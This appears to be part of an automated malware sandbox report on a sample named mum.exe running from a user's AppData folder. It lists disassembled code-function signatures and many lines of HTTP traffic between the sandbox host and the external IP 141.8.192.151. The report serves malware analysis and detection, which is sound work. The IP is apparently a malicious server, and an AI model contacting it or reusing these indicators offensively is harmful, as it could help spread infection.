Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E73BAh	26_2_002E7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E7811h	26_2_002E7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E9221h	26_2_002E8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E0FF9h	26_2_002E0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E1451h	26_2_002E11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E6231h	26_2_002E5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E6689h	26_2_002E63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E7C69h	26_2_002E79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	26_2_002E3489
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	26_2_002E3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	26_2_002E37AE
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025E6F9h	34_2_0025E440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025EB51h	34_2_0025E89A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025EFA9h	34_2_0025ECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00253897h	34_2_00253561
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025C439h	34_2_0025C17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025F401h	34_2_0025F148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025F859h	34_2_0025F5A2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025FCB1h	34_2_0025F9FA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025C891h	34_2_0025C5DA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002528E1h	34_2_00252620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025CCE9h	34_2_0025CA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00253CF7h	34_2_00253A38
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025D141h	34_2_0025CE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00252EA2h	34_2_00252A90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00254157h	34_2_00253E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025D599h	34_2_0025D2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002545B7h	34_2_002542F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025D9F1h	34_2_0025D738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00254A17h	34_2_00254758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025DE49h	34_2_0025DB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 0025E2A1h	34_2_0025DFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	34_2_0025217A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 00252EA2h	34_2_00252DD1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	34_2_00251B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	34_2_00252359
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F1D01h	34_2_005F1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F5501h	34_2_005F5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F0FF9h	34_2_005F0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F02F1h	34_2_005F0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F9221h	34_2_005F8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F8519h	34_2_005F8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F7811h	34_2_005F7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F80C1h	34_2_005F7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F73BAh	34_2_005F7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F18A9h	34_2_005F1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F6AE1h	34_2_005F6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F5DD9h	34_2_005F5B30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F8DC9h	34_2_005F8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F5981h	34_2_005F56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F8971h	34_2_005F86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F7C69h	34_2_005F79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F0BA1h	34_2_005F08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F6689h	34_2_005F63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F6F39h	34_2_005F6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F6231h	34_2_005F5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F1451h	34_2_005F11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 005F0749h	34_2_005F04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	34_2_005F3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	34_2_005F3489

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
